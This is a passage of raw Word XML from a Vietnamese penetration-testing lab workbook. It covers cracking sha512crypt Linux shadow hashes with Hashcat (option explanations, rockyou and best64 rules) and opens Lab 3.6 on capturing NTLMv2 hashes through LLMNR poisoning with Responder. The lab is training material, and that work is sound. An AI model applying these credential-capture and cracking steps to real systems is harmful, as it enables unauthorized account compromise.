    <w:p w14:paraId="1636DA70" w14:textId="3B7847DD" w:rsidR="00A605E7" w:rsidRDefault="00A605E7" w:rsidP="00360AD0">
      <w:r>
        <w:t>Sử dụng -a 6 hybrid + mask</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8A3807" w14:textId="77777777" w:rsidR="00A605E7" w:rsidRDefault="00A605E7" w:rsidP="00360AD0"/>
    <w:p w14:paraId="57DE9CAB" w14:textId="77777777" w:rsidR="00A605E7" w:rsidRDefault="00A605E7" w:rsidP="00360AD0"/>
    <w:p w14:paraId="6D3AD051" w14:textId="660D79BB" w:rsidR="00A605E7" w:rsidRDefault="00A605E7" w:rsidP="00360AD0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E03DB38" wp14:editId="2504BD59">
            <wp:extent cx="6858000" cy="407035"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="101948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9708" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId92"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="407035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="659A10F6" w14:textId="52975EC4" w:rsidR="00A605E7" w:rsidRDefault="00A605E7" w:rsidP="00360AD0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="141B773F" wp14:editId="7CBA70E4">
            <wp:extent cx="5248275" cy="752475"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="45626294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2941" name="Picture 1" descr="A close up of numbers&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId93"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5248275" cy="752475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="426A0B93" w14:textId="75DD6FD8" w:rsidR="00A605E7" w:rsidRDefault="00A605E7" w:rsidP="00360AD0">
      <w:r>
        <w:t>Crack được thêm 3 mật khẩu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDA946C" w14:textId="2F821932" w:rsidR="00A605E7" w:rsidRDefault="00A605E7" w:rsidP="00360AD0">
      <w:r>
        <w:t>Giờ ta đổi sang sử dụng ?d?s tức 1 số + 1 ký tự sau mỗi từ trong từ điển</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C233D97" w14:textId="2002C5E8" w:rsidR="00A605E7" w:rsidRDefault="00A605E7" w:rsidP="00360AD0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="256F1772" wp14:editId="49660457">
            <wp:extent cx="6858000" cy="683260"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="119935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8376" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId94"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="683260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A97B2D3" w14:textId="619A6FBC" w:rsidR="00A605E7" w:rsidRDefault="00A605E7" w:rsidP="00360AD0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CBD61C0" wp14:editId="085C0D85">
            <wp:extent cx="4429125" cy="847725"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="164479399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3995" name="Picture 1" descr="A close up of numbers&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId95"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4429125" cy="847725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="513EA383" w14:textId="69F31D10" w:rsidR="00A605E7" w:rsidRDefault="00A605E7" w:rsidP="00360AD0">
      <w:r>
        <w:t xml:space="preserve">Crack được thêm 2 mật khẩu </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2144D470" w14:textId="096F04EB" w:rsidR="00A605E7" w:rsidRDefault="00A605E7" w:rsidP="00360AD0">
      <w:r>
        <w:t>Lần này đổi qua dùng rockyou làm từ điển</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719DA5F1" w14:textId="697E5DB5" w:rsidR="00A605E7" w:rsidRDefault="003D064A" w:rsidP="00360AD0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FDDD879" wp14:editId="0D1CE53F">
            <wp:extent cx="6858000" cy="626110"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="170154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5572" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId96"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="626110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C33387" w14:textId="4F6E3639" w:rsidR="003D064A" w:rsidRDefault="003D064A" w:rsidP="00360AD0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5223005F" wp14:editId="23D22A49">
            <wp:extent cx="4219575" cy="1343025"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="193403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7872" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId97"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4219575" cy="1343025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="765439C6" w14:textId="1271C95D" w:rsidR="003D064A" w:rsidRDefault="003D064A" w:rsidP="00360AD0">
      <w:r>
        <w:t>Thêm 1 mật khẩu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499FCC6A" w14:textId="6CAA09FE" w:rsidR="003D064A" w:rsidRDefault="003D064A" w:rsidP="00360AD0">
      <w:r>
        <w:t>Xem lại các tài khoản đã crack được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB40337" w14:textId="4C0AC71F" w:rsidR="003D064A" w:rsidRDefault="003D064A" w:rsidP="00360AD0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5485BF3C" wp14:editId="0A8A9E1D">
            <wp:extent cx="6858000" cy="3789680"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="120428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5536" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId98"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="3789680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76018017" w14:textId="42037FD9" w:rsidR="003D064A" w:rsidRDefault="003D064A" w:rsidP="003D064A">
      <w:pPr>
        <w:pStyle w:val="Style3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Crack Linux passwords với Hashcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621D0963" w14:textId="580E3FC3" w:rsidR="003D064A" w:rsidRDefault="003D064A" w:rsidP="003D064A">
      <w:r>
        <w:t>Giờ ta cùng crack hash sha512crypt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B6A6E6" w14:textId="448D9F7B" w:rsidR="003D064A" w:rsidRDefault="003D064A" w:rsidP="003D064A">
      <w:r w:rsidRPr="003D064A">
        <w:t>Như chúng ta đã đề cập trước đó trong</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bài lab này</w:t>
      </w:r>
      <w:r w:rsidRPr="003D064A">
        <w:t xml:space="preserve">, việc </w:t>
      </w:r>
      <w:r>
        <w:t>lưu</w:t>
      </w:r>
      <w:r w:rsidRPr="003D064A">
        <w:t xml:space="preserve"> các mật khẩu đã</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> crack</w:t>
      </w:r>
      <w:r w:rsidRPr="003D064A">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sử dụng chúng như là </w:t>
      </w:r>
      <w:r w:rsidRPr="003D064A">
        <w:t>một tập tin từ điển có thể rất hữu ích để chúng ta không cần áp dụng các quy tắc biế</w:t>
      </w:r>
      <w:r>
        <w:t>n đổi từ</w:t>
      </w:r>
      <w:r w:rsidRPr="003D064A">
        <w:t xml:space="preserve"> cho chúng một lần nữa khi </w:t>
      </w:r>
      <w:r>
        <w:t>ta crack</w:t>
      </w:r>
      <w:r w:rsidRPr="003D064A">
        <w:t xml:space="preserve"> mật khẩu </w:t>
      </w:r>
      <w:r>
        <w:t>được</w:t>
      </w:r>
      <w:r w:rsidRPr="003D064A">
        <w:t xml:space="preserve"> băm bằng một thuật toán băm khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4108A5" w14:textId="7484F5AC" w:rsidR="003D064A" w:rsidRDefault="003D064A" w:rsidP="003D064A">
      <w:r>
        <w:t>Hãy lưu các mật khẩu vào một file, bỏ đi username vì t akhoong cần dúng chúng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B8AA57" w14:textId="51AAF343" w:rsidR="003D064A" w:rsidRDefault="003D064A" w:rsidP="003D064A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2643232A" wp14:editId="78A8C338">
            <wp:extent cx="6819900" cy="3638550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1911249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9200" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId99"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6819900" cy="3638550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="451EA714" w14:textId="555385F5" w:rsidR="003D064A" w:rsidRDefault="003D064A" w:rsidP="003D064A">
      <w:r>
        <w:t>Tiến hành crack mật khẩu linux sha512crypt sử dụng từ điển trên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6EFDCF" w14:textId="0463A12E" w:rsidR="003D064A" w:rsidRDefault="00952DEE" w:rsidP="003D064A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D2B1076" wp14:editId="17268212">
            <wp:extent cx="6858000" cy="427355"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="41134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8513" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId100"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="427355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D037F4" w14:textId="77777777" w:rsidR="00952DEE" w:rsidRDefault="00952DEE" w:rsidP="003D064A">
      <w:r>
        <w:t xml:space="preserve">The options we used are: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52305C08" w14:textId="77777777" w:rsidR="00952DEE" w:rsidRDefault="00952DEE" w:rsidP="003D064A">
      <w:r>
        <w:t xml:space="preserve">-w 3 : Workload "High" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6773EC16" w14:textId="77777777" w:rsidR="00952DEE" w:rsidRDefault="00952DEE" w:rsidP="003D064A">
      <w:r>
        <w:t xml:space="preserve">-a 0 : "Straight" mode, use the dictionary with no changes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1AFCC0" w14:textId="77777777" w:rsidR="00952DEE" w:rsidRDefault="00952DEE" w:rsidP="003D064A">
      <w:r>
        <w:t xml:space="preserve">-m 1800 : Hash mode of "sha512crypt 6, SHA512 (Unix)" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7F8CDF" w14:textId="77777777" w:rsidR="00952DEE" w:rsidRDefault="00952DEE" w:rsidP="003D064A">
      <w:r>
        <w:t xml:space="preserve">~/labs/web10.shadow : The file containing hashes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064754DA" w14:textId="77777777" w:rsidR="00952DEE" w:rsidRDefault="00952DEE" w:rsidP="003D064A">
      <w:r>
        <w:t xml:space="preserve">/tmp/passwords.txt : The wordlist </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5369BAD4" w14:textId="6A4C257E" w:rsidR="00952DEE" w:rsidRDefault="00952DEE" w:rsidP="003D064A">
      <w:r>
        <w:t>-r /usr/local/share/doc/hashcat/rules/best64.rule : Mangling rules file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7D9C6D" w14:textId="034F6C89" w:rsidR="00952DEE" w:rsidRDefault="00952DEE" w:rsidP="003D064A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="190368F0" wp14:editId="6150D6DF">
            <wp:extent cx="6858000" cy="1240790"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="103588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81356" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId101"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="1240790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="196D782A" w14:textId="2C141448" w:rsidR="00952DEE" w:rsidRDefault="00952DEE" w:rsidP="003D064A">
      <w:r>
        <w:t>Kiểm tra kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A756D81" w14:textId="3F189641" w:rsidR="00952DEE" w:rsidRDefault="00952DEE" w:rsidP="003D064A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D490AAA" wp14:editId="33383D00">
            <wp:extent cx="6858000" cy="232410"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29353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3114" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId102"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="232410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="156FCD17" w14:textId="3FB36B0D" w:rsidR="00952DEE" w:rsidRDefault="00952DEE" w:rsidP="003D064A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="611E9FDF" wp14:editId="6EE81928">
            <wp:extent cx="2419350" cy="390525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="68844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1471" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId103"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2419350" cy="390525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A96B602" w14:textId="41BF36EF" w:rsidR="00952DEE" w:rsidRDefault="00952DEE" w:rsidP="003D064A">
      <w:r>
        <w:t>Kiểm tra tất cả password mà ta đã crack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487CDA06" w14:textId="06A77B68" w:rsidR="00952DEE" w:rsidRDefault="00952DEE" w:rsidP="003D064A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62360BA9" wp14:editId="5D5A0D9B">
            <wp:extent cx="6858000" cy="2493645"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="4520786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8613" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId104"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2493645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC0C47F" w14:textId="2218C977" w:rsidR="00952DEE" w:rsidRDefault="00952DEE" w:rsidP="00431D3E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r w:rsidR="00690E47">
        <w:lastRenderedPageBreak/>
        <w:t>Lab 3.6: Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F93706" w14:textId="33A97237" w:rsidR="00690E47" w:rsidRDefault="00690E47" w:rsidP="00690E47">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
      </w:pPr>
      <w:r>
        <w:t>Mục tiêu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D276065" w14:textId="52055A92" w:rsidR="00690E47" w:rsidRDefault="00690E47" w:rsidP="00690E47">
      <w:r w:rsidRPr="00690E47">
        <w:t xml:space="preserve">Để nhận được một phản </w:t>
      </w:r>
      <w:r>
        <w:t>hồi từ</w:t>
      </w:r>
      <w:r w:rsidRPr="00690E47">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">thử </w:t>
      </w:r>
      <w:r w:rsidRPr="00690E47">
        <w:t xml:space="preserve">thách NTLMv2 bằng cách </w:t>
      </w:r>
      <w:r>
        <w:t>sử dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="00690E47">
        <w:t xml:space="preserve"> LLMNR (sử dụng Responder) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5269D479" w14:textId="6E099772" w:rsidR="00690E47" w:rsidRDefault="00690E47" w:rsidP="00690E47">
      <w:r w:rsidRPr="00690E47">
        <w:t xml:space="preserve">Để giải mã </w:t>
      </w:r>
      <w:r>
        <w:t>phản hồi từ thử thách</w:t>
      </w:r>
      <w:r w:rsidRPr="00690E47">
        <w:t xml:space="preserve"> NTLMv2 bằng cách sử dụng John The Ripper, cung cấp cho chúng t</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00690E47">
        <w:t xml:space="preserve"> thông tin đăng nhập hợp lệ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12527AE3" w14:textId="55F1BD59" w:rsidR="00690E47" w:rsidRDefault="00690E47" w:rsidP="00690E47">
      <w:r w:rsidRPr="00690E47">
        <w:t xml:space="preserve">Để </w:t>
      </w:r>
      <w:r w:rsidR="00315311">
        <w:t xml:space="preserve">đánh hơi </w:t>
      </w:r>
      <w:r w:rsidRPr="00690E47">
        <w:t xml:space="preserve">một </w:t>
      </w:r>
      <w:r w:rsidR="00315311">
        <w:t>challenge</w:t>
      </w:r>
      <w:r w:rsidRPr="00690E47">
        <w:t>/p</w:t>
      </w:r>
      <w:r w:rsidR="00315311">
        <w:t>hản hồi</w:t>
      </w:r>
      <w:r w:rsidRPr="00690E47">
        <w:t xml:space="preserve"> NTLMv2 </w:t>
      </w:r>
      <w:r w:rsidR="00315311">
        <w:t xml:space="preserve">thông </w:t>
      </w:r>
      <w:r w:rsidRPr="00690E47">
        <w:t xml:space="preserve">qua SMB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48719E1C" w14:textId="4A7D9A29" w:rsidR="00690E47" w:rsidRDefault="00690E47" w:rsidP="00690E47">
      <w:r w:rsidRPr="00690E47">
        <w:t xml:space="preserve">Để sử dụng John the Ripper và hashcat để xác định mật khẩu từ các tin nhắn xác thực NTLMv2 đã </w:t>
      </w:r>
      <w:r w:rsidR="00315311">
        <w:t>đánh hơi được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629FC79D" w14:textId="48C5A95F" w:rsidR="00315311" w:rsidRDefault="00315311" w:rsidP="00315311">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
      </w:pPr>
      <w:r>
        <w:t>Cài đặt lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F508CE" w14:textId="279F6C46" w:rsidR="00315311" w:rsidRDefault="00315311" w:rsidP="00315311">
      <w:r>
        <w:t>Máy ảo sử dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CE98FE" w14:textId="49D1B69F" w:rsidR="00315311" w:rsidRDefault="00315311" w:rsidP="00315311">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Slingshot Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1990E6" w14:textId="18DAA869" w:rsidR="00315311" w:rsidRDefault="00315311" w:rsidP="00315311">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Windows 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78216F7D" w14:textId="5218508F" w:rsidR="00315311" w:rsidRDefault="00315311" w:rsidP="00315311">
      <w:r>
        <w:t>Từ máy Linux ta sẽ dùng Responder để tấn công máy Window. Từ đây mục tiêu của chúng ta là bắt được NTLMv2 challenge/response và thực hiện tấn công vét cạn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A8F98F" w14:textId="690D3A5D" w:rsidR="00315311" w:rsidRDefault="00315311" w:rsidP="00315311">
      <w:r>
        <w:t>Ping từ Linux sang window:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7893199D" w14:textId="4D4D2D6A" w:rsidR="00315311" w:rsidRDefault="00BE77C0" w:rsidP="00315311">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24D41EA4" wp14:editId="78A838F7">
            <wp:extent cx="5410200" cy="2028825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="5094802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232" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId105"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5410200" cy="2028825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E3983A" w14:textId="0DCE2530" w:rsidR="00BE77C0" w:rsidRDefault="00BE77C0" w:rsidP="00BE77C0">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6D4127" w14:textId="640E0F20" w:rsidR="00BE77C0" w:rsidRDefault="00BE77C0" w:rsidP="00BE77C0">
      <w:pPr>
        <w:pStyle w:val="Style3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Chạy Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3407D207" w14:textId="51A43B7B" w:rsidR="00BE77C0" w:rsidRDefault="00BE77C0" w:rsidP="00BE77C0">
      <w:r>
        <w:t>Mở terminal promt trong linux và chạy lệnh sau để khởi động:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A9CD1E" w14:textId="335618B8" w:rsidR="00BE77C0" w:rsidRDefault="00BE77C0" w:rsidP="00BE77C0"/>
    <w:p w14:paraId="487FDEC9" w14:textId="3C605839" w:rsidR="00BE77C0" w:rsidRDefault="00BE77C0" w:rsidP="00BE77C0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
